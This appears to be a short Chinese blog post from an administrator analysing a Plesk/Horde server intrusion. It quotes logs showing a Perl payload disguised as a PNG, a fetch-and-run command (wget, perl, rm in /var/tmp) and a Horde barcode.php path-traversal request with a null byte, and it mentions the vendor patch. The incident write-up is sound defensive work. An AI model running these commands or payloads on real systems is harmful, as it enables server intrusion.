在 error_log 可以看到

--10:51:45-- http://fallencrafts. info/download/himad.png
 => `himad.png'
Resolving fallencrafts. info... 109.163.229.26
Connecting to fallencrafts. info|109.163.229.26|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 27,437 (27K) [image/png]
 0K .......... .......... ...... 100% 42.65 KB/s
10:51:50 (42.65 KB/s) - `himad.png' saved [27437/27437]

himad.png 其實是 perl 程式

它會假裝 apache user 執行 httpd,

如果我們 ps axu | grep httpd,有時看到是 httpd -DSSL ,有時是 httpd -k graceful,甚至 klogd 都可能是 apache user,還會看到 sh <defunct>, 然後對外作溝通,至於幹什麼事我是不知道啦

假如抓得到行程的話 (每幾秒 ps axu | grep apache),可以有機會看到它第一時間是

wget xxx.png ; cd /var/tmp ; perl xxx.png ; rm xxx.png

之後看到一些 apache user 的 httpd (非正常的)

另外在 access_log 看到

/horde/util/barcode.php?type=../../../../../../../../../../../var/log/psa-horde/psa-horde.log%00

plesk KB 是有提供解決辦法,就是 patch

 

最後修改日期: 2013 年 11 月 13 日

作者

留言

撰寫回覆或留言

發佈留言必須填寫的電子郵件地址不會公開。